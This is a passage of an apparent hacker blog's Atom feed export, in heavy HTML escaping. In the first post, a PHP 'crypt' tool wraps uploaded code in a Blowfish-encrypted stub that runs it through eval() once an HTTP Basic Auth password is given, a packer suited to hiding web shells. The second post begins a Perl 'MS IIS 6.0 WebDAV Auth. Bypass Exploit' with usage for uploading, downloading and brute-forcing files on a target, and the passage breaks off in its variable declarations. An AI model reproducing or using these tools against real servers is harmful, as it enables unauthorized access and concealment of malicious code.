220, 233) !important;"&gt;$iv&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;));&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;}&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;function&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; easy_decrypt&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$cyph_arr&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $key&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;){&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;$out &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; mcrypt_decrypt&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;MCRYPT_BLOWFISH&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $key&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; base64_decode&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$cyph_arr&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;[&lt;/span&gt;&lt;span class="lit" style="color: rgb(234, 222, 173) !important;"&gt;0&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;]),&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;MCRYPT_MODE_CBC&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; base64_decode&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$cyph_arr&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;[&lt;/span&gt;&lt;span class="lit" style="color: rgb(234, 222, 173) !important;"&gt;1&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;]));&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;return&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; trim&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$out&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;}&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$file &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $_POST&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;[&amp;amp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#39;file&amp;amp;#39;];&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;$contents &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; file_get_contents&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$file&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;$contents &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; str_replace&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&amp;amp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#39;&amp;lt;&amp;amp;#39;.&amp;amp;#39;?php&amp;amp;#39;,&amp;amp;#39;&amp;lt;&amp;amp;#39;.&amp;amp;#39;?&amp;amp;#39;,$contents);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;$contents &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;&amp;amp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#39;?&amp;amp;#39;.&amp;amp;#39;&amp;gt;&amp;amp;#39;.trim($contents).&amp;amp;#39;&amp;lt;&amp;amp;#39;.&amp;amp;#39;?&amp;amp;#39;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;$code &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $_POST&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;[&amp;amp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#39;auth&amp;amp;#39;];&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;$pass &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; sha1&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$_POST&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;[&amp;amp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#39;auth&amp;amp;#39;]);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;$cyph &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; easy_crypt&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$contents&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $code&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$source &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"&lt;br /&gt;&lt;br /&gt;&amp;lt;?php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;function easy_decrypt($cyph_arr, $key){&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;$out = mcrypt_decrypt(MCRYPT_BLOWFISH, $key, base64_decode($cyph_arr[0]),&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;MCRYPT_MODE_CBC, base64_decode($cyph_arr[1]));&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;return trim($out);&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; if (!isset($_SERVER[&amp;amp;#39;PHP_AUTH_USER&amp;amp;#39;])) {&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; header(&amp;amp;#39;WWW-Authenticate: Basic realm="&lt;/span&gt;&lt;span class="typ" style="color: rgb(234, 222, 173) !important;"&gt;Encrypted&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="typ" style="color: rgb(234, 222, 173) !important;"&gt;File&lt;/span&gt;&lt;span class="str" style="color: rgb(233, 195, 239) !important;"&gt;"&amp;amp;#39;);&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; header(&amp;amp;#39;HTTP/1.0 401 Unauthorized&amp;amp;#39;);&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; echo &amp;amp;#39;Maybe Next Time Skid.&amp;amp;#39;;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; exit;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; }else{&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;$code = $_SERVER[&amp;amp;#39;PHP_AUTH_PW&amp;amp;#39;];&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;$cyph[0] = "".$cyph[0]."";&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;$cyph[1] = "".$cyph[1]."";&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;$dec_string = easy_decrypt($cyph, $code);&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;eval($dec_string);&lt;br /&gt;&lt;br /&gt;&amp;nbsp; }&lt;br /&gt;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;?&amp;gt;&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-5677357913883300366?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/5677357913883300366/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/php-crypt.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/5677357913883300366'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/5677357913883300366'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/php-crypt.html' title='PHP Crypt'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-4448347647706742927</id><published>2012-01-29T01:01:00.002+06:00</published><updated>2012-01-29T01:01:25.431+06:00</updated><title type='text'>MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 (perl)</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;pre class="prettyprint" style="background-attachment: initial; background-clip: initial; background-color: #1a1a1a; background-image: initial; background-origin: initial; border-bottom-color: rgb(59, 59, 59); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(59, 59, 59); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(59, 59, 59); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(59, 59, 59); border-top-style: solid; border-top-width: 1px; color: #bcbcbc; font-size: 11px; line-height: 18px; overflow-x: auto; overflow-y: auto; padding-bottom: 8px; padding-left: 8px; padding-right: 8px; padding-top: 8px; text-align: -webkit-auto;"&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#!/usr/bin/perl&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp;********* !!! WARNING !!! *********&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp;* &amp;nbsp; FOR SECURITY TESTiNG ONLY! &amp;nbsp; &amp;nbsp;*&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp;***********************************&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp;MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp;v1.1 add brute force dir fuction. 2009-05-29&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp;v1.0 download?upload and list dir. 2009-05-24&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp;Usage:&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; -target &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; eg.: 192.168.1.1&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; -port &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; eg.: 80 &lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; -method &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; eg.: g&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp;(p:PUT,g:GET,l:LIST)&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; -webdavpath &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; eg.: webdav &lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; -BruteForcePath &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; eg.: brute force webdav path&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; -file &amp;nbsp; &amp;nbsp; &amp;nbsp; (optional) &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;eg.: test.aspx&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp;Example:&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; put a file:&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; get a file:&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; list dir:&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; brute force + list dir:&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; brute force + get file:&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&amp;nbsp; &lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;use&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; IO&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;::&lt;/span&gt;&lt;span class="typ" style="color: rgb(234, 222, 173) !important;"&gt;Socket&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;use&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;/span&gt;&lt;span class="typ" style="color: rgb(234, 222, 173) !important;"&gt;Getopt&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;::&lt;/span&gt;&lt;span class="typ" style="color: rgb(234, 222, 173) !important;"&gt;Long&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;use&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; threads&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;use&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; threads&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;::&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;shared&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# Globals Go Here.&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;my&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $target&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;# Host being probed.&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;my&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $port&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 